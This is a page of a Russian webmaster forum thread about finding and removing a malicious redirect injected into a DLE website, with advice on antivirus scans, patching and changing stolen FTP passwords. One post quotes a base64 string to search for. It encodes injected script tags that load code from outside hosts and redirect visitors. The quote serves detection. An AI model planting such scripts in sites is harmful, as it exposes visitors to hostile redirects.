DLE вирусяка. Помогите найти :(

123
SeWork
На сайте с 14.10.2007
Offline
133
#11

Найти очень просто. При запуске штатного антивируса, система покажет несанкционированные изменения в файлах. Хотя если уверены, что не в tpl-ах, тогда просто обновите дистрибутив, самый простой выход.

Так же залатать дыры, как в самом DLE, так и в модулях, если стоят (особенно модуль Переходы)

а как его выявить?

Закодируйте в base64 редирект который стоит на сайте, и поищите в файлах отрывки кода.

В вашем случае:

PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cDovL3Rha2V0b3AxMDAuY

29tL2pzL2luaXQuMi5taW4uanMiPjwvc2NyaXB0PjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2
NyaXB0IiBzcmM9Imh0dHA6Ly9teG1vYnkucnUvanMucGhwP3JlZGlyZWN0PWh0dHAlM0EvLzB
jNC5ydS9nL2dvLnBocCUzRnNpZCUzRDEiPjwvc2NyaXB0PiA=
Ссылки продаю по баснословным деньгам на буржуйской бирже (http://feeds.tr0e.com/?a=20818)
S
На сайте с 27.09.2011
Offline
14
#12
addurl:
Я вам бесплатно подскажу: Не храните пароли от фтп в тотал командоре. Хотя конечно и из некоторых других фтп клиентов тырят тоже.
Так что у вас по плану действия:
Снести фтп учетки в фтп менеджере.
Сменить пароль на хостинг аккаунт(+фтп).
Ну и далее уже спокойно искать у себя на локали трояна, который увел старые пароли.
При неудачном поиске - формат C: и установка ОС заново. И более не запускать кряки и прочий сомнительный фри софт/игры на рабочей машине.

фууу!

у него шелл

siv1987
На сайте с 02.04.2009
Offline
427
#13

Палю тему, если стоит перед доктайпом строка в одном из исполняющемся файле.

Хортица
На сайте с 22.12.2006
Offline
289
#14

Успокойтесь товариши. Уже все найдено и вычищено.

На XBit.Money (https://xbit.money/?rid=111) меняю крипту на гривны. Лучшие курсы Обмен Вашего PayPal/ЯД/QIWI/WebMoney и куча плюшек! Рекомендую (https://exchangex.ru/index.php?who=26749)
WhiteFalke
На сайте с 16.09.2007
Offline
184
#15

Спасибо Кириллу! Помог вылечить гадину. В 6ти местах сидело. Старались блин.

A
На сайте с 18.05.2008
Offline
207
#16
servlevis:
фууу!
у него шелл

Я назвал наиболее популярную причину ввиду отсутствия заявлений о шелле в первом посте.

С другой стороны - шелл тоже бывает воруют, ломают, брутят.

LineHost.Org - Хостинг и VPS в Москве | VPS в США (http://linehost.org/) WebNicks.Com - Дешевая Регистрация Доменов Онлайн (http://webnicks.com/)
Хортица
На сайте с 22.12.2006
Offline
289
#17
addurl:
С другой стороны - шелл тоже бывает воруют, ломают, брутят.

Чооооо ?! o_O

Вы почитайте в гугле что есть shell (шел) а что есть ssh ???

A
На сайте с 18.05.2008
Offline
207
#18
Хортица:
Чооооо ?! o_O
Вы почитайте в гугле что есть shell (шел) а что есть ssh ???

Вы спрашиваете или возражаете?

Попробуйте открыть учебник русского языка. А то не понятно как вам отвечать.

Хортица
На сайте с 22.12.2006
Offline
289
#19

Поведайте пожалуйста, как могут "брутить шел". А так же я бы был особо признателен, если бы Вы так же рассказали, что в Вашем понимании есть "ломают шел"

S
На сайте с 27.09.2011
Offline
14
#20

Для взлома шела в шел заливают шел!

123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий